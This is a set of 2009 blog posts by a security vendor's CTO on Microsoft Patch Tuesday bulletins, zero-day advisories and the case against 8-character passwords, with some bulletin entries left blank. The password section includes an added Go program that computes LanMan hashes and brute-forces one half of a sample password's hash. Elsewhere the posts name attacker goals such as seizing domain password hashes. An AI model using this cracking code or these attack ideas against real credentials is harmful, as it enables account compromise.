From the Desk of the CTO
Eric Schultze

Horseshoes and Hand Grenades

Like the old saying goes, "Close only counts in horseshoes and hand grenades." I've developed a corollary this week: "The number of flaws only matters to VA scanners and journalists." I've read many news releases this week talking about the record number of flaws/vulnerabilities that Microsoft fixed in the June '09 Patch Tuesday release. For the record, I'm saying "Not Relevant."

Let's take MS09-019 as an example. MS09-019 is a cumulative update for Microsoft Internet Explorer. The Microsoft bulletin details eight individual flaws that were addressed by the patches referenced in the security bulletin. Each flaw can be exploited in the same manner: visit an evil website and the evil website can run code on your system. And the closely related point: the evil code will run in the context of the currently logged on user. As a Systems Administrator, one thing is clear to me: if my users visit an evil website, their machines can be exploited. How do I rectify this? I can apply the suggested patch. Do I care that there were eight different underlying flaws that would lead to the evil code execution? No. Do I need to take eight different steps to protect myself from this vulnerability? No. Can I patch my systems to protect them from only 7 of the 8 vulnerabilities? No. What I do care about is the amount of effort required to protect my machines from this issue. That answer is "1". One patch will protect me from these issues, whether there is only 1 listed flaw or 17 listed flaws. One patch does the trick.

Microsoft issued ten security bulletins covering some much larger number of flaws (I won't list that number here, because I can't be bothered to count something that is irrelevant). As a Systems Administrator, I should look at my maximum effort as something up to "10". Some of the bulletins may be for products that don't impact me; therefore, the number could be somewhat lower.
Some months, Microsoft has released more than 10 bulletins. That tells me more work is required. Other months, Microsoft has only released one bulletin, so seemingly less effort is required to fix my systems than when 10 bulletins appear. If Microsoft only released one bulletin in a month, and that bulletin addressed 52 issues, does that mean it's almost twice as much effort to remediate my systems vs. a month that had 10 bulletins but a purported lower number of vulnerabilities? No. Could Microsoft manipulate the way that they call out the flaws in their bulletins? Sure. Does Microsoft list out all of the additional variants that they found internally when researching the externally reported flaw? No sir. This could hike the flaw numbers much higher. Could Microsoft combine like flaws into single reported flaws? Yes, though they'd need to appease the individuals who reported the items to them, so they each get their day in the sun. And how about those VA scanners?

All of the above is irrelevant. I care about the number of patches. To that end, how many patches were released on the June 2009 patch day? Have any journalists mentioned this? Not that I've seen. The number of patches released is, at the end of the day, a better reflection of the amount of effort required to make your company secure. I frequently hear people ask "how many patches did Microsoft release today?" and the answer is something along the lines of "10 today". No, this is the number of security bulletins released. The number of patches is something else entirely. For June 2009, Microsoft released 64 unique security bulletin-related patches. This includes English x86 and x64 (but not ia64): 362 MB in total, if you care to know. (Multi-national organizations need to multiply the number of patches by the number of languages they manage.) Worst case, I have a subset of up to 64 different patches to apply to each of my systems. The tough part is figuring out which ones go to which systems.
Those companies that do patch management by hand are in a world of hurt; there's no way to manage each of these by hand. But I digress... Let's start a new trend: let's talk about the true numbers on patch day, those that reflect the actual level of effort, not those that allow journalists to go for sensationalism or help Mozilla justify themselves vs. Microsoft.

Reflections on June 2009 Patch Day

Microsoft released 10 security bulletins this month. Eight of the ten were assigned exploitability indices of "1 - Consistent Exploit Code Likely". This means hackers could have access to exploit code fairly soon, which means the patches should be installed sooner rather than later. Five of the ten security bulletins discuss server-side vulnerabilities (vs. client-side vulnerabilities). More on server-side vs. client-side in a future post. See the end of this post for recommendations on which to install first.

MS09-018: Vulnerabilities in Active Directory Could Allow Remote Code Execution (971055)

For the attack to be successful against Windows 2000 DCs, the attacker simply needs to target their attack against the LDAP ports (tcp 389, 636, 3268, or 3269). While these ports are traditionally blocked at Internet firewalls, they are wide open for attack on most internal networks. The attacker doesn't need any special authentication to attack Windows 2000 servers. Once they launch the code, they can take any action they wish against the domain controller. If I were the attacker, I'd go after the Active Directory database (NTDS.dit), which holds the password hashes of every domain user. For Windows Server 2003, the attack is somewhat mitigated in that the attacker must have some level of credentials to the domain controller. In most instances, this means the attacker must be a member of the domain which he or she is attacking. The vulnerability is rated Important on WS03 as it doesn't allow code execution; it just jams up the server from doing what it should.
I'd recommend patching Windows 2000 AD servers as soon as possible. I'd also patch Windows Server 2003 systems quickly, as you don't want disgruntled employees launching the tool of the week to down your domain controllers.

MS09-019: Cumulative Security Update for Internet Explorer (969897)

The IE8 issue impacts Windows XP systems when browsing evil Internet websites. Vista and WS08 systems are protected against evil Internet sites because of their built-in DEP and ASLR protections. Vista systems can be vulnerable to evil Intranet sites if other security configs on the Vista box have been weakened. In any event, it's nice that this zero-day flaw in IE8 has been corrected. Go apply the patch. The remaining issues addressed in the bulletin impact IE versions 5, 6 and 7. Exploitation can range from information disclosure to what Microsoft calls remote code execution (and I call local code execution). Workaround: don't visit evil websites. This is a client-side collection of vulnerabilities, as they require someone at the target system to take an action on the machine in order to allow the vulnerabilities to execute. Therefore, this attack is more likely to impact your end-user workstations than your datacenter servers.

MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)

While this vulnerability doesn't allow the attacker to write files to or execute code on the server, it might allow them to read enough information from the server that they can exploit other services on the box (think SQL Server). See my prior post, New Microsoft IIS Zero-Day Vulnerability, on this issue for more information.

MS09-021: Vulnerabilities in Microsoft Office Excel Could Allow Remote Code Execution (969462)

The Excel 2000 platform is rated Critical, whereas Excel 2002-2007, SharePoint, and the Excel converters are rated Important. Excel 2000 is rated Critical because it lacks the open dialog confirmation window that exists in later releases.
This means if you have Excel 2000 installed and you visit an evil web page, the web page can open Excel and launch the evil document without your knowledge. You're hacked. In Excel 2002 and later, the evil document wouldn't open automatically; rather, it would prompt you whether you wish to open the file. If the evil file does execute, it runs under the context of the currently logged on user (typical of a client-side vulnerability).

MS09-022: Vulnerabilities in Windows Print Spooler Could Allow Remote Code Execution (961501)

In this instance, the attacker can execute code on Windows 2000 systems remotely; however, the attacker must first install a print server on their own machine, then send RPC packets to the target system, instructing the target to connect to the rogue print server. When the target system enumerates the share name of the rogue server, the attacker's code can execute on the remote system. Windows XP and later systems aren't vulnerable to this attack; however, they are vulnerable to several other attacks. In the first, a locally logged on user can read or print any file on the system, even if they don't have access to the file. The local attacker can specify the file they want to read as a separator page, thus allowing it to be viewed. The second attack is a privilege escalation attack. The attacker can send RPC packets to the target system, convincing it to load an evil print driver DLL. Once this happens, the attacker can execute code on the system. In order for this to happen the attacker must have the "manage printers" capability (which is granted to locally logged on users). For Windows 2000, this is a Critical issue. For Vista and WS08, this is Important. For XP and WS03 systems, this is rated Moderate.
MS09-023: Vulnerability in Windows Search Could Allow Information Disclosure (963093)

If an evil file is indexed by the search engine (whether it be an email message, document, or data file) AND appears at the top of a search result (performed by the user), HTML script embedded in the evil file can execute on the target system. The attacker's script could access data on the system and forward it back to the attacker. Alternatively, if the evil file is not returned as the top search result, the script will still execute if the user selects and previews the search result for the evil file. The above scenario is seemingly complex, which probably helped get it rated Moderate rather than Important. Also, Windows Search is not installed on these platforms by default. If you're a hacker looking to read data on a system, I'd look to other exploits before attempting this one. Windows Search has had two prior security updates: MS09-015 and MS08-075.

MS09-024: Vulnerability in Microsoft Works Converters Could Allow Remote Code Execution (957632)

The code will execute with the same level of permissions as the currently logged on user (administrator, in many cases) and can do anything the logged on user can do. This patch replaces MS08-072 for Works 8.5.

MS09-025: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)

While this exploit might be most beneficial to (the few) computer users who don't have admin permissions to their local systems, the exploit can also be leveraged by folks who use Terminal Services to reach remote computers, and in some cases by users who have code upload capabilities to hosted web servers. Because it requires that the user have some level of access to execute code on the target system, Microsoft has rated this Important. Microsoft also says that proof of concept code has been released for several of the vulnerabilities addressed by this patch. This patch replaces MS09-006 (which was Critical).
MS09-026: Vulnerability in RPC Could Allow Elevation of Privilege (970238)

In order to pull off this attack, a remote attacker would need to send carefully constructed packets to a vulnerable RPC service on the target machine. Third party apps can choose any tcp or udp ports to use for their services, so it's not as easy as saying tcp 139 or 445. Third party services that implement tight authentication and security over their RPC services are less likely to be susceptible to exploitation. To be sure that you're safe, install this patch and ask your vendors if they include any code that looks like the examples here: http://tinyurl.com/nsoqn6.

MS09-027: Vulnerabilities in Microsoft Office Word Could Allow Remote Code Execution (969514)

Recommended order of deployment:
First: MS09-018 (Win2K), MS09-019 (IE), MS09-020 (IIS)
After: all the rest
Disclaimer: adjust these recommendations for the assets on your network

7 is still better than 8, but passphrases are best

I wrote up the below in response to a question on a newsgroup about the best password length. It's an old topic, but still very relevant. See my original piece here: http://www.securityfocus.com/infocus/1319

For Windows minimum password length, the difference between 7 and 8 is computationally negligible these days. What matters is the LanMan hash (which is still created by default, on both servers and workstations): it splits the password into two 7-character halves and hashes each half independently, so an 8-character password puts its eighth character alone in the second half. Enforcing an eight character complex password means users will typically put the special character (*&^%$) as the last character. (And many users will only create the minimal length password.) That leaves the first seven characters as alphanumeric, which can be cracked with a small character set in a password cracker. The eighth character is then the special character, which is the only character in the second half of the LanMan hash, so it cracks instantly. You've then compromised a complex password of 8 characters in a matter of minutes.
If the password minimum length is seven, most users will make theirs seven, which means the special character is within the first 7 (probably last, but that doesn't matter), which means in order to crack the LanMan hash you'd need to run the cracker with the entire character set (not just alphanumerics) over the entire 7 character range, which will take a long time. By this reasoning, a seven character complex password will usually be tougher to crack than an 8-12 character complex password. If you insist upon using 8, then make sure to set the registry key on all desktops, servers, and domain controllers to not create the LanMan hash (the NoLMHash value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, or the equivalent Group Policy setting "Network security: Do not store LAN Manager hash value on next password change"). Then, run some of the freeware tools available to delete all existing LanMan hashes from the password history (as they can be used to help guess what the current password is). Better yet, enforce a minimum of 15 characters. You should still run a tool to delete all the old password hashes just to be safe. With a 15 character password, Windows won't store an LM hash at all, so it will be much tougher to crack.

I've done an experiment in the classroom on password length (before Steve Riley wrote an article on this; no offense, Steve!). I ask each person on one side of the classroom to pick a password. They think up a password, one they would typically use at work. Don't say it, just think of it. Then I ask people on the other side of the classroom to think of a passphrase. Don't say it out loud, just think of it. I ask the first side of the room (password) to count the length of the password they thought of, and I ask the others (passphrase) to count the length of their passphrase. The first side of the room is usually sitting between 7 and 13 characters long. The second side of the classroom is anywhere from 20 to 60 characters long (rarely shorter than 15). Asking users to think of passwords as "passphrases" is a really good way to encourage long password length.
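The two-half structure of the LanMan hash, and why it makes the eighth character free for an attacker, is easier to see in code. The following is an added example written for this page in Go; it is not from the original post and not a Shavlik tool. It computes the LM hash the way Windows does (upper-case the password, null-pad to 14 bytes, DES-encrypt the constant KGS!@#$% under each 7-byte half), then recovers the second half of a constructed sample password ("Secret7!", my assumption, not from the post) by trying at most one character from the printable set, and shows that a 15+ character passphrase leaves no LM hash to attack. The ASCII-only upper-casing and the sample password are my simplifications; everything else is the standard algorithm.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// LM upper-cases before hashing, so the alphabets are 36 alphanumerics
// versus 36 + 33 ASCII specials = 69 characters.
const (
	alnum     = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	special   = " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
	printable = alnum + special
)

var lmMagic = []byte("KGS!@#$%") // fixed plaintext each half encrypts

// lmKey spreads 7 key bytes into 8 DES key bytes: 7 key bits per byte,
// low bit left as the (ignored) parity bit.
func lmKey(half []byte) []byte {
	var bits uint64
	for _, b := range half {
		bits = bits<<8 | uint64(b)
	}
	k := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		k[i] = byte(bits&0x7F) << 1
		bits >>= 7
	}
	return k
}

// lmHalf is one 8-byte half of the LM hash: DES(lmKey(half), "KGS!@#$%").
func lmHalf(half []byte) []byte {
	block, err := des.NewCipher(lmKey(half))
	if err != nil {
		panic(err) // unreachable: lmKey always returns 8 bytes
	}
	out := make([]byte, des.BlockSize)
	block.Encrypt(out, lmMagic)
	return out
}

// LMHash returns the upper-case hex LM hash Windows stores for password,
// or "" for 15+ characters, which Windows does not LM-hash at all.
// The password is upper-cased (ASCII only here), null-padded to 14 bytes
// and split into two 7-byte halves that are hashed independently.
func LMHash(password string) string {
	if len(password) > 14 {
		return ""
	}
	p := make([]byte, 14)
	copy(p, strings.ToUpper(password))
	h := append(lmHalf(p[:7]), lmHalf(p[7:])...)
	return strings.ToUpper(hex.EncodeToString(h))
}

// crackHalf brute-forces one half on its own: every string of 0..maxLen
// characters from alphabet, depth-first. It returns the plaintext, the
// number of DES operations spent, and whether the half was recovered.
func crackHalf(target []byte, alphabet string, maxLen int) (string, int, bool) {
	tries := 0
	var cand []byte
	var search func(depth int) bool
	search = func(depth int) bool {
		tries++
		half := make([]byte, 7)
		copy(half, cand)
		if bytes.Equal(lmHalf(half), target) {
			return true
		}
		if depth == maxLen {
			return false
		}
		for i := 0; i < len(alphabet); i++ {
			cand = append(cand, alphabet[i])
			if search(depth + 1) {
				return true
			}
			cand = cand[:len(cand)-1]
		}
		return false
	}
	found := search(0)
	return string(cand), tries, found
}

func main() {
	// Constructed sample, not from the post: 7 alphanumerics + 1 special.
	h := LMHash("Secret7!")
	second, _ := hex.DecodeString(h[16:])
	plain, tries, _ := crackHalf(second, printable, 1)
	fmt.Printf("LM(Secret7!) = %s\nsecond half = %q after %d DES ops\n", h, plain, tries)
	fmt.Printf("LM of a 15+ char passphrase = %q (not stored)\n", LMHash("correct horse battery"))
}
```

The second half of "Secret7!" falls after a few dozen DES operations because it holds a single character; the first half then needs only the 36-character alphanumeric set, at most 36^7 (about 7.8 x 10^10) candidates. A 7-character password whose special character can sit anywhere forces the full 69-character set over all 7 positions, 69^7 (about 7.4 x 10^12) candidates, roughly 95 times more work, which is the post's argument in numbers. Run with "go run" to see the hashes; a 7-character password leaves the second half empty, which the search recovers on its very first try.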
It's usually easier for a user to remember their passphrase, and it's easy for them to change it next month (they can simply change a word or value in their phrase). A good passphrase usually includes one or more spaces in the phrase, which helps with the special character requirement (how many people put spaces in their passwords? not many...). Therefore, if you want to go with a minimum less than 15, use 7, else do 15+ and educate folks about the coolness of the passphrase. Just don't use 8. (See my article here on why 7 is better than 8: http://www.securityfocus.com/infocus/1319)

New Microsoft IIS Zero-Day Vulnerability

Today (May 19, 2009) Microsoft released a security advisory for Microsoft IIS servers. This flaw can enable attackers to read sensitive files on the web server by submitting a specially crafted URL to the IIS server. This is only the third vulnerability we've seen in IIS since October of 2004 (the last issues were February 2008 and July 2006); IIS has been pretty secure over the last few years (unlike the years 2000-2004, where we saw numerous bulletins, patches, and exploitations such as Code Red and Nimda). This flaw appears to be much more serious for customers running IIS 5 (Windows 2000) because the vulnerable WebDAV services are running by default. IIS 6 (Windows Server 2003) doesn't enable WebDAV by default. It is unclear what level of access may be granted to an attacker via this exploit, as it all depends on how the web server has been configured and how file system security has been applied to the data on the web server. In a default configuration (and I would gather most installations), this flaw might allow the attacker to read certain files on the web server, but would not allow them to write any files. If the attacker is unable to write any files to the web server, it's far less likely that the attacker can upload or execute any malicious code on the server or gain additional levels of access to the server.
One note of caution: this flaw could enable attackers to read code pages on the web server, where these pages might include usernames or passwords for applications or databases controlled by the web server. Shavlik recommends people running IIS 5 or IIS 6 run the IIS Lockdown and URLScan tools from Microsoft. Both of these tools disable WebDAV and will protect your system from this latest zero day.

Microsoft releases patch for PowerPoint 0-day flaw

Microsoft patched all Windows versions of PowerPoint today, addressing both a 0-day flaw and 13 other privately reported security vulnerabilities. The 0-day vulnerability enabled attackers to take over client machines if a user opened a malformed PowerPoint document or visited an evil website. The attacker would be able to execute code on the user's machine with the same level of permissions afforded to the logged on user. (If the user was logged on as an administrator, the evil code could execute as admin. If the user was logged on as a user-level account, then the evil code could only execute with user permissions and not admin permissions.)

April 2009 Patch Day – Spring Cleaning

A slew of Microsoft updates this month: eight bulletins released, 5 Critical, 2 Important, and 1 Moderate. While eight bulletins is a larger number than in recent months, this month's release includes fixes for a number of issues that Microsoft previously identified as too laborious or complex to fix. This includes fixes for the Safari Carpet Bombing and SearchPath issues, additional enhancements for credential reflection (à la the SMBRelay fix in MS08-068), and the Service Isolation issues called out at a 2008 security conference. Microsoft had previously stated that each of these issues was either too complex to solve or didn't represent an actual vulnerability. It's enlightening to see that they've taken a second look at each of these topics and have found solutions to address each.
In probably their most ambitious patch to date, Microsoft even pulled developers off of Windows 7 to assist with the creation of the MS09-012 patch (discussed below). We can only hope that Microsoft continues in this vein and re-examines other parts of the Operating System that were thought too complex to fix. Gory details below...

Microsoft knocked off patches MS09-009 and MS09-010 for several outstanding 0-day issues, including fixes for Excel (advisory 968272 from February 09) and WordPad/Office (advisory 960906 from December 08). Users should install these patches right away because exploits for these issues have been circulating on the Internet for several months. On to the good stuff:

1. Starting with the Carpet Bombing fixes: Microsoft has released two patches to deal with this issue, an IE patch and an OS patch. MS09-014 is a cumulative IE patch that addresses 6 vulnerabilities, one of these being the carpet bomb fix. In this scenario, an attacker would force an evil file down to a user's desktop (through the initial release of the Apple Safari web browser). The evil file would be assigned a specific name, one that happened to match a normal Operating System file. When the user later opened Internet Explorer, IE would execute the evil "system" file from the desktop rather than the similarly named (legitimate) file from the system directory. MS09-014 solves this issue by removing the current working directory (in this case, the desktop) from the search path. When IE is launched, it will now look in the system path for the proper file rather than loading the illegitimate file from the desktop. The IE fix was accomplished by modifying two of the IE DLLs so that they don't look in the current working directory first (when loading other app DLLs).
While this fix only modifies Internet Explorer, Microsoft exposed a registry key that users can modify if they want to make all of their applications ignore the current working directory:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLESEARCHPATH_KB963027]
"iexplore.exe"=dword:00000000

The second fix for the carpet bombing issue was released in MS09-015, an OS patch for XP and later systems. This patch does two things: 1. It modifies one system DLL (secur32.dll) that incorrectly searched for schannel.dll in the current working directory, and 2. It introduces API support that application developers can use in their code to get safe search behaviour. Those APIs are SetDllDirectory, which removes the current working directory from DLL loading, and SetSearchPathMode, which moves the current working directory to the end of the directories searched by the SearchPath API.

2. The second issue addressed this month (and also requiring installation of two patches) addresses more avenues for credential reflection. Credential reflection was first addressed in MS08-068. That bulletin addressed a scenario where opening a malicious email or document, or viewing an evil website, would send an NTLM challenge-response derived from your credentials (username and password) to the attacker. The attacker could then turn this around and "replay" it to gain access to your computer. The MS08-068 patch addressed this issue when the attack vector was using the SMB protocol. MS09-013 is an Operating System patch that solves the same problem but is specific to the WinHTTP connection engine (using the HTTP protocol).
MS09-014 is the Internet Explorer patch (previously referenced re: the carpet bombing fix) that also includes a fix for the credential reflection issue, but this time when using WinINet (HTTP protocol) as the underlying connection engine when IE is used for establishing authentication. In both credential reflection attacks, the attacker needs to have SMB access to the target system. The SMB access enables them to mount the registry and file system. Since the SMB protocol (tcp 139 or tcp 445) is usually blocked at the Internet gateway/firewall, these attacks are more prone to execution on an internal corporate network. The MS09-014 WinINet attack vector is worrisome in this environment, as Internet Explorer is configured by default to present credentials to remote systems when browsing in the Intranet zone. To prevent your machine from being mounted via a credential reflection attack, install MS08-068, MS09-013, and MS09-014. (This will prevent the attack when your system was the one that originally sent credentials to the attacker. It will NOT prevent exploitation if matching credentials gathered from another system are reflected from that system to your system.)

3. The last, and most interesting, patch that I'll mention is MS09-012. This patch addresses "Token Kidnapping". Essentially, it helps prevent applications running as NetworkService or LocalService from escaping their sandboxes and running as LocalSystem. In short, it means better protection for your web and SQL servers. Token Kidnapping is detailed in a whitepaper by Cesar Cerrudo (http://www.argeniss.com/research/TokenKidnapping.pdf) and was presented at last year's Hack in the Box conference (April 2008). By using impersonation functions, these services can execute code under a different context, where LocalSystem is the preferred context (as this has super-admin permissions). As a result, code can be executed with administrative rights.
Any application that uses NetworkService or LocalService (and SeImpersonate) is susceptible to this attack. The most common attack vectors include IIS servers and SQL Servers. IIS 6 and 7 servers run under the NetworkService context and enable FullTrust for .NET applications by default, making them an ideal candidate for this kind of attack. This becomes a concern when we look at web servers where users are allowed to upload code to the server. The most common scenario is a multi-tenant web server where an ISP is running websites for multiple customers on the same server. Each customer is allowed to upload their web pages to their own website. If the customer uploads a specially crafted .aspx page, when that page is viewed the .aspx page executes code as LocalSystem on the server. This can give the customer administrative access to the entire web server, for example allowing them access to all the websites on that server, not just their own site. From here, the customer (hacker) can access backend SQL databases or sensitive information, upload backdoors to the server, connect to other servers on the inside of the ISP network, etc. Not good. Microsoft expended a great deal of effort in correcting this issue, even pulling developers off of Windows 7 to assist with this patch. Certain parts of the fix were backported from Vista and Windows Server 2008 (tokens) while brand new code had to be written for all Operating Systems (XP through 2008). As a result of the effort, the MS09-012 patch provides Service Isolation that mitigates the attacks identified by Cesar Cerrudo.

Shavlik's recommended order of installation:
Server Systems:
Reflections on March 2009 Patch Day

Three new security bulletins released today. All three of today's bulletins apply to the Operating System, though some apply to a smaller subset of machines, and each has a completely different impact on the end user experience (or lack of experience if you aren't exploited). The most critical of today's patches is MS09-006, which could allow an attacker to take complete control of your computer if you view a website, email, or document that contains an evil graphic or picture. Also Critical (in my mind, though Microsoft rates it Important) is a set of patches for Windows DNS servers. Attackers can leverage this flaw to redirect Internet traffic to look-alike websites in hopes of gathering sensitive user information. Lastly, Microsoft issued a patch to correct an issue where attackers can access restricted websites that require certificates, even though they don't have the certificate. I recommend installing MS09-006 and MS09-008 right away, and while you're at it, go ahead and install MS09-007; that way you can install patches for all three vulnerabilities at the same time and leverage the same system reboot to complete the patch installation. Being OS patches, they should all be relatively simple to install. Microsoft did NOT release a patch for the Excel zero day vulnerability. Maybe we can expect this as an out of band patch later this month? Also, Adobe has just released a new version of Adobe Reader 9 to correct a zero day vulnerability that was previously announced.

DETAILS

MS09-006: While the common attack vector may be via images hosted on a website of questionable repute, the attack can also be spawned by viewing emails or documents with embedded images. Once again, don't open documents or emails from people you don't know. Don't rule out hacks spawned from evil images hosted on Facebook. This patch should be very safe to deploy and requires a reboot.
Best to patch this first on machines where end-users exist (laptops, desktops, etc.), then deploy to servers (where users are less likely to be reading emails, opening documents, or surfing the web). This patch applies to all Operating Systems and replaces MS08-061 (a kernel patch), which itself replaced MS08-025 (an earlier kernel patch).

MS09-007 is a seemingly innocuous spoofing vulnerability that can actually pose great concern for certain types of users. This vulnerability can be used to connect to a website or resource that requires certificate-based authentication. Usually, this means that only users with the required certificate can access the site. However, in this scenario, an attacker could access the restricted site even though they don't have the necessary certificate. In order to pull this off, the attacker needs a copy of the victim user's client authentication certificate (only its public part; the private key is not required), which is something that is most easily obtained if the attacker has full access to the victim's computer (and if this is the case, far worse things can happen). Many users don't ever do anything with certificate-based authentication for secure sites. Those that do probably use an Active Directory based certificate store, which thwarts this attack. Those that do use local accounts and certificates are most at risk from this vulnerability and should install the patch right away. All others can roll it out as they see fit, though if you're rolling out MS09-006, just go ahead and roll this out at the same time and leverage the shared reboot. This vulnerability impacts all Operating Systems. The patch supersedes the one released for MS07-031, which also addressed an SChannel vulnerability.

MS09-008 addresses a vulnerability in the DNS and WINS services that could allow an attacker to insert bad data into a DNS (or WINS) server, thereby redirecting people's traffic to potentially evil websites.
The security bulletin doesn't list any workarounds, nor does it imply any prerequisites on the part of the attacker, meaning it could be possible for a remote, unauthenticated attacker to modify a vulnerable DNS server and redirect its users. Assuming this knowledge is correct, that would make this a Critical issue, rather than a severity of Important, in my eyes. The sole purpose of a DNS server is to direct individuals to the proper end-location. If an unauthenticated remote attacker can modify these instructions and redirect people to bogus websites then the DNS server isn't doing its job and should be considered compromised. That's a pretty serious situation: attackers can set up look-alike websites hoping to entice users to enter sensitive information (though the redirection attack is thwarted by using SSL, provided users heed the certificate warning they will get at the look-alike). Any way I look at it, this should be a Critical patch to install on all DNS servers right away. (Maybe Microsoft rated this Important as the level of effort to pull off this attack is so great that the likelihood of exploitation is minimal? However, exploit code was released for an earlier, similar exploit.) A similar patch was released for WINS servers to handle a similar type of attack, though limited to the internal WINS server and its network. This patch supersedes MS08-037 (a prior DNS spoofing issue) and requires a reboot.

Excel zero day flaw announced

Microsoft released a security advisory today about a new Excel vulnerability. This vulnerability impacts all versions of Microsoft Excel from 2000 to 2007. In order to exploit a system, the attacker needs to entice the user to open a malformed Excel document. If this happens, the attacker can then take any action on the target system under the context of the logged on user. If the logged on user is an administrator, then the attacker can do anything they wish on the system (delete files, reformat the hard drive, steal information from the system, etc.).
If the logged on user is a 'user' on the system (and not admin), then the attacker has fewer options on the box (read data accessible to the end user, delete data written by the end user, etc.). Microsoft is researching the issue and will probably create a patch to fix the issue. This is not unlike any other Microsoft Office vulnerability, except in this instance, knowledge of the vulnerability has been made public before a patch is available. Shavlik encourages users not to open Excel documents from unknown senders or locations.

Zero Day vulnerability in Adobe Reader and Adobe Acrobat

A security vulnerability was recently identified in two Adobe products that could allow attackers to take complete control of your system. Opening a malformed PDF document could allow unintended code to execute without the knowledge of the local user. The evil code could do anything on the system, up to the level of access given to the currently logged on user. Security researchers are seeing limited, targeted attacks in the wild. In most instances, the evil PDF file will crash the Adobe application, and in some instances may try to entice users to install a malicious anti-spyware application. Adobe intends to patch their PDF products starting on March 11, 2009. Until the patch is released, users may protect themselves by disabling JavaScript in their Adobe applications. However, recent research indicates that even this workaround (disabling JavaScript) does not prevent exploitation of this vulnerability. More info here: The official Adobe response here:

Reflections on February 2009 Patch Day

A seemingly light batch of patches this month, trailing an even lighter, single patch release in January. Two Critical items were released - including patches for Internet Explorer 7 and Microsoft Exchange Server. Additionally, two Important items were released - for Microsoft SQL Server and Visio.
MS08-067 OOB Patch - Conficker - Downadup worm

AV vendor F-Secure estimates that over 8 million systems have been infected with a variant of the Conficker worm known as 'Downadup'. This worm leverages the security vulnerability addressed by the Microsoft out-of-band patch MS08-067 released in October 2008.

More information, and an official apology, on MS09-001

I've received queries from press, end users, and vendors about my commentary on patch Tuesday and would like to take this time to provide some background on what led to my comments as well as a slightly tempered position on the patch itself. On patch Tuesday, I read the 09-001 bulletin. Upon reading about the issue I immediately got a bad feeling about it. Unauthenticated exploitation via the SMB protocol is really bad. Prior history shows that this can lead to really evil things, including events similar to Blaster and Sasser. Our PR firm was hounding me to push out commentary to the press, so I gave them what I knew (see below). My commentary was spot on - at least with as much as was written in the security bulletin itself (http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx). It wasn't until a few hours later, when I was able to catch my breath and do further perusal, that I stopped by to view Microsoft's short version of the security bulletins for January (http://www.microsoft.com/technet/security/bulletin/ms09-jan.mspx). In this spot, they include the exploitability index for each of the bulletins released during the month. For MS09-001, they rated it a '3 - functioning exploit code unlikely'.
They also included a link to a blog post with more information (http://blogs.technet.com/swi/archive/2009/01/09/ms09-001-prioritizing-the-deployment-of-the-smb-bulletin.aspx). In this blog post, Microsoft explains that the likelihood of exploitation is mitigated by the vast amount of information that the attacker must have about a particular machine in order to exploit that machine using the 09-001 vulnerability. Specifically, they say, "Controlling what data is overwritten is difficult. To exploit this type of kernel buffer overrun, an attacker typically needs to be able to predict the layout and contents of memory. The memory layout of the targeted machine will depend on various factors such as the physical characteristics (RAM, CPUs) of the system, system load, other SMB requests it is processing, etc."

Had I read this before I released my patch commentary, I would have modified my comments to say, "This is potentially a very bad flaw - but Microsoft has assured us that the knowledge required to exploit this is quite high, is unlikely to be available to the attacker, and even in those cases where the information can be obtained, the ability to actually get exploitable code is infinitesimally small, therefore the risk on this should be considered as something lower than the 'Critical' rating which Microsoft has assigned." I would have continued on to say, "Unauthenticated SMB flaws are similar in nature to what was exploited in the Blaster and Sasser worms. While these ports are usually blocked on Internet firewalls and personal firewalls, these ports are typically left open in a corporate network. If a worm is released, and that worm makes it into a corporate network, it will make Swiss cheese of that network relatively quickly. Fortunately, it appears that the likelihood of a worm for this vulnerability is very low." And if I was feeling particularly feisty, I would also ask, "Why doesn't Microsoft include the exploitability index in the bulletin itself?
Why must I visit other variants of the bulletin to obtain this information, and then a third location to read details that tell me that the Critical issue of which I was alerted probably isn't that Critical after all? Make it easy - include the Exploitability Index in the bulletin!"

So here's my official apology for crying wolf on this issue when I should have done my due diligence and read all three Microsoft locations before offering my opinion on this issue. That being said... you should still get this patch installed on your systems.

MS09-001

MS09-001 is a super critical patch to install right away. This vulnerability is similar to what prompted the Blaster and Sasser worms a few years ago. We expect to see a worm released for this in the very near future. This flaw enables an attacker to send evil packets to a Microsoft computer and take any action they desire on that computer - no credentials required. The only pre-requisite for this attack to be successful is a connection from the attacker to the victim over the NetBIOS (File and Printer Sharing) ports (tcp 139 or 445). By default, most computers have these ports turned on. While these ports are usually blocked on Internet firewalls and personal firewalls, these ports are typically left open in a corporate network. If a worm is released, and that worm makes it into a corporate network, it will make Swiss cheese of that network relatively quickly.

MS08-078 Emergency IE patch

Microsoft's latest IE out-of-band patch release needs to be installed right away. The number of infected websites is growing at an alarming rate - even people visiting legitimate websites are getting hacked with this exploit. Patch it now - just do it. Why did this come out as an out-of-band release? It looks like Microsoft was informed of the IE zero day at the same time as everyone else - namely, last Tuesday (patch Tuesday).
Based on Microsoft MSRC blog posts, starting on Tuesday, Microsoft studied the exploit and reviewed source code and determined that it impacted all versions of IE. From that point on, it can be assumed that Microsoft has been working quickly on a patch for all versions of IE. Microsoft had to determine how serious the issue was - as that gave them guidance as to whether or not to release an out-of-band patch or wait until the next monthly cycle. By late last week, Microsoft was aware that this issue was starting to infect users' systems at a faster rate than they've seen with past zero day exploits. Specifically, attackers were loading the exploit on legitimate websites so that even users who visit only non-nefarious websites might also get infected. Based on this level of data, it's my belief that Microsoft decided the issue warranted an out-of-band patch release. Researching, fixing, testing, and releasing a security patch within an eight day window is an incredible feat - especially given the need to support all versions of IE across all platforms and languages. This is an 'all hands on deck' response from Microsoft - I don't think we'll see this as the norm for less critical patches in the future as it is quite disruptive to their own processes. Now, it's equally important for customers to roll out this patch to all of their systems as soon as possible. I'd bet you a cookie that many companies can't get it rolled out as quickly as Microsoft got it built.

Internet Explorer Zero Day Mass Hysteria

